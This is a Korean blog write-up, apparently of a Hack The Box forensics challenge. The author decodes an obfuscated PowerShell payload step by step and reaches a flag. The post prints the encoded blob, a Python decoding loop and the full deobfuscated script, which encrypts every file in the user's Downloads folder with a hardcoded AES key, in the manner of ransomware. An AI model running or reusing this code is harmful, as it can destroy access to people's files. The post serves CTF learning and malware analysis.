xADAAYwA5AHcAMwA2AGMAMQAxADUAUgAxADEAOQBjADQANgBSADQAMABSADMAOQB9ADgANwB3ADEAMQA0AGMAMQAwADUAJQAxADEANgBVADMAOQBjADQAMwBjADMAOQBjADEAMAAxAH0AMwA5AGMANAAxAH0ANAA2AFUANwAzAHcAMQAxADAAUgAxADEAOABVADEAMQAxAH0AMQAwADcAdwAxADAAMQBwADQAMABNADMANgBwADEAMQA1ACUAMQAxADYAdwAxADEANwBYADEAMAAyAFgAMQAwADIASQA0ADEAVQAxADMAcAAxADAAdwA5AHcAMwA2AE0AMQAxADUAfQAxADEAOQBYADQANgBNADQAMABSADMAOQBJADYANwBwADMAOQBJADQAMwBVADMAOQAlADEAMAA4AFgAMQAxADEAWAAxADEANQBVADEAMAAxAEkAMwA5AH0ANAAxACUANAA2AE0ANwAzAEkAMQAxADAAfQAxADEAOABwADEAMQAxAE0AMQAwADcAYwAxADAAMQB3ADQAMABYADQAMQB9ADEAMwAlADEAMABYADkAWAAzADYAJQA5ADkAfQAxADEANQBYADQANgBSADQAMAAlADMAOQB3ADYANwBYADMAOQB9ADQAMwBVADMAOQBYADEAMAA4AGMAMQAxADEAUgAxADEANQBYADEAMAAxAE0AMwA5AHAANAAxACUANAA2AH0ANwAzAE0AMQAxADAAcAAxADEAOABSADEAMQAxACUAMQAwADcAYwAxADAAMQAlADQAMABVADQAMQB9ADEAMwBjADEAMABJADkAfQAzADYAVQAxADAAOQBVADEAMQA1AFIANAA2AHAANAAwAGMAMwA5AFUANgA3AFgAMQAwADgAJQAxADEAMQBSADEAMQA1AEkAMwA5AE0ANAAzAHcAMwA5AE0AMQAwADEAfQAzADkAdwA0ADEAUgA0ADYAJQA3ADMAVQAxADEAMABjADEAMQA4AFgAMQAxADEAcAAxADAANwAlADEAMAAxAFUANAAwAHAANAAxAHcAMQAzAE0AMQAwAEkAOQBSADMANgBwADEAMQA0AE0ANAA2AEkANAAwAFUAMwA5AHcANgA3AFgAMQAwADgAfQAxADAAMQBNADkANwB3ADMAOQBVADQAMwAlADMAOQBYADEAMQA0ACUAMwA5AH0ANAAxACUANAA2ACUANwAzAEkAMQAxADAAfQAxADEAOABJADEAMQAxAFIAMQAwADcAVQAxADAAMQB3ADQAMABYADQAMQBJADEAMwBwADEAMAB3ADkASQA5ADEASQA5ADgAdwAxADIAMQBJADEAMQA2AGMAMQAwADEAVQA5ADEAVQA5ADMAJQA5ADMAcAAzADYATQAxADEANwB3ADEAMQA2AH0AMQAxADUATQAzADIAcAA2ADEASQAzADIASQAzADYAJQAxADAAOQBJADEAMQA1AFgANAA2AEkANAAwAFgAMwA5AFIAOAA0AFgAMQAxADEAfQA2ADUAfQAxADEANAB9ADMAOQB3ADQAMwBNADMAOQB3ADEAMQA0AE0AOQA3AH0AMQAyADEAUgAzADkAUgA0ADEAdwA0ADYAWAA3ADMAcAAxADEAMAAlADEAMQA4AH0AMQAxADEATQAxADAANwBwADEAMAAxAHAANAAwAHAANAAxAGMAMQAzAHcAMQAwAFgAOQBJADkAMQB3ADEAMAA1AGMAMQAxADEAfQA0ADYATQAxADAAMgBwADEAMAA1AE0AMQAwADgATQAxADAAMQB9ADkAMwBNADUAOABwADUAOABJADQAMAAlADMAOQAlADgANwBJADMAOQBSADQAMwBVADMAOQBNADEAMQA0AE0AMQAwADUAUgAxADEANgB9ADEAMAAxACUAMwA5AFUANAAzAHAAMwA5AHcANgA1AH0AMQAwADgAWAAzADkAJQA0ADMAcAAzADkAJQAxADAAOAB9ADMAOQB9ADQAMwB9ADMAOQBwADYANgBwADEAMgAxAFIAMQAxADYAcAAxADAAMQBVADEAMQA1AEkAMwA5AFIANAAxAHcANAA2AEkANwAzAFgAMQAxADAAJQAxADEAOABjADEAMQAxAEkAMQAwADcAUgAxADAAMQBNADQAMAB3ADMANgBSADEAMAAxAFgAMQAxADQAcAAxADEANgB3ADQANABJADMANgBYADEAMQA3ACUAMQAxADYAfQAxADEANQBSADQAMQBVADEAMwBSADEAMABjADEAMgA1ACcALgBzAHAAbABJAHQAKAAnAFgAdwBjAEkATQBwAH0AVQBSACUAJwApAHwAIAAlAHsAIAAoAFsAYwBIAGEAcgBdACAAWwBJAE4AVABdACAAJABfACkAfQAgACkAKQA=x
여기서 base64 인코딩에 해당하는 부분만 따로 추출해서 복호화를 해보았습니다.
IEX( -joiN('36w97%32p61}32X34I36c72c79%77}69w92%92I100M111U119X110U108w111U97M100X115}34w13}10p13}10X91X82c101}102w108w101R99I116I105U111M110M46M65R115w115w101U109M98I108U121U93}58w58p40p39w76%111U39%43U39I97}100%70U105c39w43w39c108I101M39}41c46c73I110c118p111}107U101w40M40}40U40U34w123w48X125U123w49p53c125U123R49X50%125U123U49w48%125w123I51w125X123I49M52}125c123c49U54U125}123M57w125p123U52p125p123I50U125M123%49}49M125}123%49X51%125w123c54}125c123M53}125M123w56I125R123w49U55p125c123c49I125M123c55U125M34X45w102U32p39R67R58I107%98w51w87p73X39%44}39p98I39p44%39%119R111c114w39%44%39R102}116M39w44w39p98M51M70p114}97}109X101U39w44}39M83R121I115%116c101%39I44%39c98U51X39c44I39I46p100c108p108U39R44I39M109R39w44c39R84X107w39U44c39I98U51w77w105c99I114U111I115}111}39p44c39M107X107}39p44c39M83U107}39I44w39I98w51U118%50p46}48M46M53%48X55U50U55%107U39U44X39p46R39%44p39}78U68w79U87}39}44I39p78p69p39w44X39M46}87R101X39w41w41U46c34X82}69U112I96%76X97p99I101%34X40U40I91I67R72R97I82R93p49p48c55}43R91X67X72R97w82w93%57p56R43}91M67w72w97R82p93I53p49%41%44M91}115I116%114U105X78w103p93w91%67I72R97I82M93c57U50X41I41I41I32X124X32w38R40c34R123X48}125}123%49c125X34p32}45c102p32U39I111c117X116p45%39M44w39c110%117U108X108I39M41}13c10M13M10w13w10}46M40%34U123X50R125R123c49U125}123}48X125%34U32R45R102w39U45U67M104%105I108p100I73M116R101R109w39I44c39%101M116I39c44%39}71}39I41M32%45%80R97U116M104p32I36I97%32p124c32%38}40}34w123U50c125X123%48X125w123M49U125c34}45R102}39}99U104I45U79U98M39p44}39I106U101c99p116%39X44}39}70M111U114w101c97w39}41X32p123I13X10M9%36%101c114p116R32w61p32p36U95%46p34X70w85c96I76%76w110c65X77I69%34R32M43U32w40w34w123}48}125M123X49w125R123w50X125}34p45R102c32p39M46%101R39I44}39p110R39%44w39M99}101U100p39I41R13U10%9U36c115%116c117I102w102X32p61U32U38X40U34%123M49I125c123I50R125X123%48I125X34}45U102w39U116R39R44U39M71X101%116M45X67X111M110I39U44U39}116M101w110R39%41R32U36%95p46I34M102c117}96w76I108R110M97c77U101M34X13I10}9}13M10p9p36U100w114M116%32}61w32I91}83c121%115U116p101}109M46p67w111p110U118M101M114X116M93I58X58X40}39}70}39X43w39X114w111c109%66c97X115%101M39c43I39}54X39%43U39}52w83w116%114}105I110M39I43w39c103M39M41X46I73c110U118p111I107}101X40U40%34%123%48I125%123I51%125R123%50}125U123R49R125X123R53I125p123p52I125R34U45X102X32w39R83U70M39R44}39p48c98}110w77U119M98p84X78}51%97%68R78p83X39p44w39p73w39I44M39M82}67M101U51w39I44w39w81c61M61}39%44}39%102U39}41w41M13w10}9%36w114R32R61M32p38R40}34X123M50X125R123M49c125p123X48I125I123c51w125I34w32U45X102%32w39w98w39U44U39U79I39X44X39%110p101M119}45c39R44%39R106X101p99U116c39p41I32U40p34p123p49p48%125R123R53R125c123c49U125U123U48R125M123c57X125X123p51R125I123}54M125M123c55R125}123R50U125}123c52p125X123w56}125}34w45M102U39p101c99%117X114X105p116w39w44w39U46U83}39U44I39}100c97R101M39}44c39I103w114U39R44I39p108M77I97I110c39I44R39U121%115%116I101w109X39M44%39M97p112}104}121}46M82w105R106R39w44%39X110%39R44U39c97U103}101w100R39M44c39}121R46%67w114c121U112}116I111}39U44R39%83U39w41X32R13U10w9c36I99p32}61I32X36c114I46I40w39}67p114p101R39I43c39X97}116w101c69p110I39I43R39U99}114M121%39%43w39I112U116c111p39%43M39M114X39c41%46p73U110}118}111I107X101U40R36X100%114R116R44%32U40c49p46R46c49M54U41p41c13M10R9U36w109I115M32}61R32X38U40M34c123p50p125R123%49I125%123%48%125U34I45X102M32M39p99U116p39X44c39w98I106c101}39w44%39c110I101U119w45I79c39U41R32R40X34R123M51w125p123R49}125%123%48c125I123c50w125}34c45U102c32R39R116R39c44U39p79I46R77%101U109I111w114%121M83I39U44M39U114I101p97}109p39U44M39M73R39w41I13c10p9p36I99}115U32p61p32}38M40U34X123R48X125X123}49I125}123}50X125c34X32R45c102c39U110}39%44w39X101U119R45M39}44I39c79M98U106X101M99p116%39}41X32R40I34c123}50c125M123p52c125U123p53U125I123I48}125U123}55X125R123U49c125w123U57M125M123X51I125p123%56I125p123I54X125}34}32}45I102c39}67M114I121w39}44p39M103I39w44w39w83X39%44c39I67w114I121w112X116M39X44w39X101M99w117I114}105I39c44I39R116%121%46p39w44X39U97%109%39}44p39%112}116%111w39w44I39}111w83I116%114R101R39X44M39%114M97p112X104X121I46U39M41%32I36R109M115w44U36c99X44c40c34R123X48c125U123M49M125M34p45X102c39p87I39X44c39p114w105X116w101I39U41}13U10X9U36M115M119w32X61%32I38%40}34%123U49I125M123}50X125M123c48p125R34w45M102X32}39M116M39c44R39w110I101R119%39w44w39X45U79}98R106U101p99%39U41X32p40R34w123w48%125c123c50I125c123R52I125p123I49p125X123I51c125}34I32p45p102c32c39I73I79p39I44}39c97p109R39U44X39I46}83p116%114M39p44M39I87R114w105U116p101I114I39p44p39w101M39}41%32X36}99w115w13c10c9w36c115R119c46R40R39}87w114c105%116U39c43c39c101}39c41}46U73w110R118U111}107w101p40M36p115%116w117X102X102I41U13p10w9w36M115}119X46M40R39I67p39I43U39%108X111X115U101I39}41%46M73I110}118p111M107c101w40X41}13%10X9X36%99}115X46R40%39w67X39}43U39X108c111R115X101M39p41%46}73M110p118R111%107c101%40U41}13c10I9}36U109U115R46p40c39U67X108%111R115I39M43w39M101}39w41R46%73U110c118X111p107%101U40p41w13M10I9R36p114M46I40U39w67X108}101M97w39U43%39X114%39}41%46%73I110}118I111R107U101w40X41I13p10w9I91I98w121I116c101U91U93%93p36M117w116}115M32p61I32I36%109I115X46I40X39R84X111}65}114}39w43M39w114M97}121R39R41w46X73p110%118}111M107p101p40p41c13w10X9I91w105c111}46M102p105M108M101}93M58p58I40%39%87I39R43U39M114M105R116}101%39U43p39w65}108X39%43p39%108}39}43}39p66p121R116p101U115I39R41w46I73X110%118c111I107R101M40w36R101X114p116w44I36X117%116}115R41U13R10c125'.splIt('XwcIMp}UR%')| %{ ([cHar] [INT] $_)} ))
솔직히 여기서 이 코드가 무슨 코드인지 당시 문제 풀 때는 알 수 없었습니다. 시간은 흘러가고 푼 문제는 한 개도 없어서 마음이 급한 상황에서 그냥 무작정 프로그래밍 언어가 다 거기서 거기겠지 하고 마냥 자체적으로 해석해서 풀었습니다.
.splIt('XwcIMp}UR%')| %{ ([cHar] [INT] $_)} ))
저는 위 코드를 다음과 같이 해석했습니다.
앞에 오는 문자열 중 X, w, c, I, M, p, }, U, R, % 에 해당하는 문자를 모두 제거하고 나온 결과물인 int(정수형 숫자)값들을 전부 char(문자형)으로 변환해라.
그리고 아래 코드에서 numbers 는 정규식으로 모두 대체하였습니다.
그리고 위 숫자들을 아래 코드와 같이 배열에 넣고 chr 로 문자로 변환했습니다.
numbers = [36,97,32,61,32,34,36,72,79,77,69,92,92,100,111,119,110,108,111,97,100,115,34,13,10,13,10,91,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,40,39,76,111,39,43,39,97,100,70,105,39,43,39,108,101,39,41,46,73,110,118,111,107,101,40,40,40,40,34,123,48,125,123,49,53,125,123,49,50,125,123,49,48,125,123,51,125,123,49,52,125,123,49,54,125,123,57,125,123,52,125,123,50,125,123,49,49,125,123,49,51,125,123,54,125,123,53,125,123,56,125,123,49,55,125,123,49,125,123,55,125,34,45,102,32,39,67,58,107,98,51,87,73,39,44,39,98,39,44,39,119,111,114,39,44,39,102,116,39,44,39,98,51,70,114,97,109,101,39,44,39,83,121,115,116,101,39,44,39,98,51,39,44,39,46,100,108,108,39,44,39,109,39,44,39,84,107,39,44,39,98,51,77,105,99,114,111,115,111,39,44,39,107,107,39,44,39,83,107,39,44,39,98,51,118,50,46,48,46,53,48,55,50,55,107,39,44,39,46,39,44,39,78,68,79,87,39,44,39,78,69,39,44,39,46,87,101,39,41,41,46,34,82,69,112,96,76,97,99,101,34,40,40,91,67,72,97,82,93,49,48,55,43,91,67,72,97,82,93,57,56,43,91,67,72,97,82,93,53,49,41,44,91,115,116,114,105,78,103,93,91,67,72,97,82,93,57,50,41,41,41,32,124,32,38,40,34,123,48,125,123,49,125,34,32,45,102,32,39,111,117,116,45,39,44,39,110,117,108,108,39,41,13,10,13,10,13,10,46,40,34,123,50,125,123,49,125,123,48,125,34,32,45,102,39,45,67,104,105,108,100,73,116,101,109,39,44,39,101,116,39,44,39,71,39,41,32,45,80,97,116,104,32,36,97,32,124,32,38,40,34,123,50,125,123,48,125,123,49,125,34,45,102,39,99,104,45,79,98,39,44,39,106,101,99,116,39,44,39,70,111,114,101,97,39,41,32,123,13,10,9,36,101,114,116,32,61,32,36,95,46,34,70,85,96,76,76,110,65,77,69,34,32,43,32,40,34,123,48,125,123,49,125,123,50,125,34,45,102,32,39,46,101,39,44,39,110,39,44,39,99,101,100,39,41,13,10,9,36,115,116,117,102,102,32,61,32,38,40,34,123,49,125,123,50,125,123,48,125,34,45,102,39,116,39,44,39,71,101,116,45,67,111,110,39,44,39,116,101,110,39,41,32,36,95,46,34,102,117,96,76,108,110,97,77,101,34,13,10,9,13,10,9,36,100,114,116,32,61,32,91,83,121,115,116,101,109,46,67,111,110,118,101,114,116,93,58,58,40,39,70,39,43,39,114,111,109,66,97,115,101,39,43,39,54,39,43,39,52,83,116,114,105,110,39,43,39,103,39,41,46,73,110,118,111,107,101,40,40,34,123,48,125,123,51,125,123,50,125,123,49,125,123,53,125,123,52,125,34,45,102,32,39,83,70,39,44,39,48,98,110,77,119,98,84,78,51,97,68,78,83,39,44,39,73,39,44,39,82,67,101,51,39,44,39,81,61,61,39,44,39,102,39,41,41,13,10,9,36,114,32,61,32,38,40,34,123,50,125,123,49,125,123,48,125,123,51,125,34,32,45,102,32,39,98,39,44,39,79,39,44,39,110,101,119,45,39,44,39,106,101,99,116,39,41,32,40,34,123,49,48,125,123,53,125,123,49,125,123,48,125,123,57,125,123,51,125,123,54,125,123,55,125,123,50,125,123,52,125,123,56,125,34,45,102,39,101,99,117,114,105,116,39,44,39,46,83,39,44,39,100,97,101,39,44,39,103,114,39,44,39,108,77,97,110,39,44,39,121,115,116,101,109,39,44,39,97,112,104,121,46,82,105,106,39,44,39,110,39,44,39,97,103,101,100,39,44,39,121,46,67,114,121,112,116,111,39,44,39,83,39,41,32,13,10,9,36,99,32,61,32,36,114,46,40,39,67,114,101,39,43,39,97,116,101,69,110,39,43,39,99,114,121,39,43,39,112,116,111,39,43,39,114,39,41,46,73,110,118,111,107,101,40,36,100,114,116,44,32,40,49,46,46,49,54,41,41,13,10,9,36,109,115,32,61,32,38,40,34,123,50,125,123,49,125,123,48,125,34,45,102,32,39,99,116,39,44,39,98,106,101,39,44,39,110,101,119,45,79,39,41,32,40,34,123,51,125,123,49,125,123,48,125,123,50,125,34,45,102,32,39,116,39,44,39,79,46,77,101,109,111,114,121,83,39,44,39,114,101,97,109,39,44,39,73,39,41,13,10,9,36,99,115,32,61,32,38,40,34,123,48,125,123,49,125,123,50,125,34,32,45,102,39,110,39,44,39,101,119,45,39,44,39,79,98,106,101,99,116,39,41,32,40,34,123,50,125,123,52,125,123,53,125,123,48,125,123,55,125,123,49,125,123,57,125,123,51,125,123,56,125,123,54,125,34,32,45,102,39,67,114,121,39,44,39,103,39,44,39,83,39,44,39,67,114,121,112,116,39,44,39,101,99,117,114,105,39,44,39,116,121,46,39,44,39,97,109,39,44,39,112,116,111,39,44,39,111,83,116,114,101,39,44,39,114,97,112,104,121,46,39,41,32,36,109,115,44,36,99,44,40,34,123,48,125,123,49,125,34,45,102,39,87,39,44,39,114,105,116,101,39,41,13,10,9,36,115,119,32,61,32,38,40,34,123,49,125,123,50,125,123,48,125,34,45,102,32,39,116,39,44,39,110,101,119,39,44,39,45,79,98,106,101,99,39,41,32,40,34,123,48,125,123,50,125,123,52,125,123,49,125,123,51,125,34,32,45,102,32,39,73,79,39,44,39,97,109,39,44,39,46,83,116,114,39,44,39,87,114,105,116,101,114,39,44,39,101,39,41,32,36,99,115,13,10,9,36,115,119,46,40,39,87,114,105,116,39,43,39,101,39,41,46,73,110,118,111,107,101,40,36,115,116,117,102,102,41,13,10,9,36,115,119,46,40,39,67,39,43,39,108,111,115,101,39,41,46,73,110,118,111,107,101,40,41,13,10,9,36,99,115,46,40,39,67,39,43,39,108,111,115,101,39,41,46,73,110,118,111,107,101,40,41,13,10,9,36,109,115,46,40,39,67,108,111,115,39,43,39,101,39,41,46,73,110,118,111,107,101,40,41,13,10,9,36,114,46,40,39,67,108,101,97,39,43,39,114,39,41,46,73,110,118,111,107,101,40,41,13,10,9,91,98,121,116,101,91,93,93,36,117,116,115,32,61,32,36,109,115,46,40,39,84,111,65,114,39,43,39,114,97,121,39,41,46,73,110,118,111,107,101,40,41,13,10,9,91,105,111,46,102,105,108,101,93,58,58,40,39,87,39,43,39,114,105,116,101,39,43,39,65,108,39,43,39,108,39,43,39,66,121,116,101,115,39,41,46,73,110,118,111,107,101,40,36,101,114,116,44,36,117,116,115,41,13,10,125]
for i in numbers:
print(chr(i), end='')
그리고 운에 따른 건지 한번에 어떤 결과물이 나왔습니다.
$a = "$HOME\\downloads"
[Reflection.Assembly]::('Lo'+'adFi'+'le').Invoke(((("{0}{15}{12}{10}{3}{14}{16}{9}{4}{2}{11}{13}{6}{5}{8}{17}{1}{7}"-f 'C:kb3WI','b','wor','ft','b3Frame','Syste','b3','.dll','m','Tk','b3Microso','kk','Sk','b3v2.0.50727k','.','NDOW','NE','.We'))."REp`Lace"(([CHaR]107+[CHaR]98+[CHaR]51),[striNg][CHaR]92))) | &("{0}{1}" -f 'out-','null')
.("{2}{1}{0}" -f'-ChildItem','et','G') -Path $a | &("{2}{0}{1}"-f'ch-Ob','ject','Forea') {
$ert = $_."FU`LLnAME" + ("{0}{1}{2}"-f '.e','n','ced')
$stuff = &("{1}{2}{0}"-f't','Get-Con','ten') $_."fu`LlnaMe"
$drt = [System.Convert]::('F'+'romBase'+'6'+'4Strin'+'g').Invoke(("{0}{3}{2}{1}{5}{4}"-f 'SF','0bnMwbTN3aDNS','I','RCe3','Q==','f'))
$r = &("{2}{1}{0}{3}" -f 'b','O','new-','ject') ("{10}{5}{1}{0}{9}{3}{6}{7}{2}{4}{8}"-f'ecurit','.S','dae','gr','lMan','ystem','aphy.Rij','n','aged','y.Crypto','S')
$c = $r.('Cre'+'ateEn'+'cry'+'pto'+'r').Invoke($drt, (1..16))
$ms = &("{2}{1}{0}"-f 'ct','bje','new-O') ("{3}{1}{0}{2}"-f 't','O.MemoryS','ream','I')
$cs = &("{0}{1}{2}" -f'n','ew-','Object') ("{2}{4}{5}{0}{7}{1}{9}{3}{8}{6}" -f'Cry','g','S','Crypt','ecuri','ty.','am','pto','oStre','raphy.') $ms,$c,("{0}{1}"-f'W','rite')
$sw = &("{1}{2}{0}"-f 't','new','-Objec') ("{0}{2}{4}{1}{3}" -f 'IO','am','.Str','Writer','e') $cs
$sw.('Writ'+'e').Invoke($stuff)
$sw.('C'+'lose').Invoke()
$cs.('C'+'lose').Invoke()
$ms.('Clos'+'e').Invoke()
$r.('Clea'+'r').Invoke()
[byte[]]$uts = $ms.('ToAr'+'ray').Invoke()
[io.file]::('W'+'rite'+'Al'+'l'+'Bytes').Invoke($ert,$uts)
}
또 다시 난독화되어 있는 코드를 만나볼 수 있는데, 위 코드는 특정 경로에 존재하는 파일들을 암호화 시켜서 새로운 파일을 만들어내는 (전혀 안 위험한?) 랜섬웨어 코드인 것 같아보입니다. 일단 문제 풀이로써 출력시켜볼 코드로는 마찬가지로 또 base64 인코딩된 문자열입니다. 해당 문자열을 순서대로 조립(?)해서 base64 디코딩해보겠습니다.
SFRCe3I0bnMwbTN3aDNSfQ==
atob("SFRCe3I0bnMwbTN3aDNSfQ=="); // javascript base64 decoding
"HTB{r4ns0m3wh3R}"
이렇게 Flag가 나왔습니다.
문제 풀고 나서 든 생각으로는 다음에는 VBA 자동 분석 도구를 좀 알아보고 좀 더 안전하고 효율적으로 분석해보았으면 하는 마음이 있었습니다. 포렌식 문제를 처음 접하다보니 좀 난해하게 푼 것 같았습니다.
728x90
반응형
'보안 > Wargame' 카테고리의 다른 글
| [Hackthebox] - USB Ripper Writeup(문제풀이) (0) | 2021.08.03 |
|---|---|
| [Hackthebox] - Illumination Writeup(문제풀이) (0) | 2021.08.03 |
| [Hackthebox] - petpet rcbee Writeup(문제풀이) (0) | 2021.07.12 |
| [Hackthebox] - Weather App Writeup(문제풀이) (0) | 2021.07.12 |
| [Hackthebox] - Cap Writeup(문제풀이) (0) | 2021.07.06 |
댓글
